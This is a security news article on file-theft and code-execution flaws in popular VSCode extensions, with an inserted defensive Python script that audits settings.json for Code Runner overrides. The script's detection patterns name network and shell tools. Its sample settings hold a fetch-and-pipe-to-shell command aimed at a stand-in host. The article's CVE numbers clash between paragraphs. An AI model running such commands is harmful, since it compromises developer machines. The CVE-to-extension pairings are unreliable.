
Flaws in popular VSCode extensions expose developers to attacks


Vulnerabilities with high to critical severity ratings affecting popular Visual Studio Code (VSCode) extensions collectively downloaded more than 128 million times could be exploited to steal local files and execute code remotely.

The security issues impact Live Server (CVE-2025-65715), Code Runner (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned).

Researchers at application security company Ox Security discovered the flaws and have been trying to disclose them since June 2025. However, the researchers say that no maintainer responded.

Remote code execution in IDE

VSCode extensions are add-ons that expand the functionality of Microsoft's integrated development environment (IDE). They can add language support, debugging tools, themes, and other functionality or customization options.

They run with significant access to the local development environment, including files, terminals, and network resources.

Ox Security published reports for each of the discovered flaws and warned that keeping the vulnerable extensions could expose the corporate environment to lateral movement, data exfiltration, and system takeover.

An attacker exploiting the CVE-2025-65717 critical vulnerability in the Live Server extension (over 72 million downloads on VSCode) can steal local files by directing the target to a malicious webpage.

The CVE-2025-65715 vulnerability in the Code Runner VSCode extension, with 37 million downloads, allows remote code execution by changing the extension's configuration file. This could be achieved by tricking the target into pasting or applying a malicious configuration snippet in the global settings.json file.
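Because the Code Runner issue hinges on command overrides living in settings.json, a defender's first step is to audit that file for such overrides. The script below is an added example, not code from the article, from Ox Security, or from the Code Runner project. It assumes that Code Runner keeps its per-language run commands under settings keys beginning with `code-runner.executorMap` (a key prefix taken from the extension's own settings, not from the article), and it uses a constructed sample settings file; the command-pattern heuristics are an assumption about what deserves a second look, not a definition of the vulnerability.

```python
"""Audit a VS Code settings.json for Code Runner command overrides.

Added example (not from the article or the extension's maintainers).
Assumption: Code Runner stores per-language commands under keys that start
with "code-runner.executorMap". The sample settings below are constructed.
"""
import json
import re
import sys

# Assumed Code Runner setting prefix (covers executorMap and its variants).
EXECUTOR_PREFIX = "code-runner.executorMap"

# Heuristic: command fragments that a run command for a language rarely needs.
SUSPICIOUS = re.compile(
    r"(curl|wget|base64|Invoke-WebRequest|powershell|/dev/tcp|\|\s*(ba)?sh\b|\bnc\b)",
    re.IGNORECASE,
)


def strip_jsonc(text):
    """Convert settings.json (JSON with comments and trailing commas) to JSON.

    String-aware so that '//' or '/*' inside a quoted value is preserved.
    """
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):       # line comment
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):       # block comment
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # drop trailing commas before a closing brace/bracket
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def audit_settings(text):
    """Return (setting_key, language, command, flagged) for every override."""
    data = json.loads(strip_jsonc(text))
    findings = []
    for key, value in data.items():
        if not key.startswith(EXECUTOR_PREFIX) or not isinstance(value, dict):
            continue
        for lang, cmd in value.items():
            cmd = str(cmd)
            findings.append((key, lang, cmd, bool(SUSPICIOUS.search(cmd))))
    return findings


def flagged_commands(text):
    """Only the overrides that matched a suspicious pattern."""
    return [f for f in audit_settings(text) if f[3]]


# Constructed sample: one ordinary override and one that should be flagged.
SAMPLE_SETTINGS = r'''{
  // user settings (constructed sample)
  "editor.fontSize": 14,
  "code-runner.executorMap": {
    "python": "python3 -u",
    "javascript": "node; curl -s http://example.invalid/p | sh",
  },
}'''


if __name__ == "__main__":
    # Usage: python audit_settings.py [path/to/settings.json]
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SETTINGS
    for key, lang, cmd, flagged in audit_settings(src):
        print(("FLAG  " if flagged else "ok    ") + f"{key}[{lang}] = {cmd}")
```

Run it against the global settings.json of each developer machine (or feed it from a fleet-wide collection job); any flagged override, and really any override a developer does not recognise, is worth removing before the extension runs a file.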

Rated with a high-severity score of 8.8, CVE-2025-65716 affects Markdown Preview Enhanced (8.5 million downloads) and can be leveraged to execute JavaScript via a maliciously crafted Markdown file.
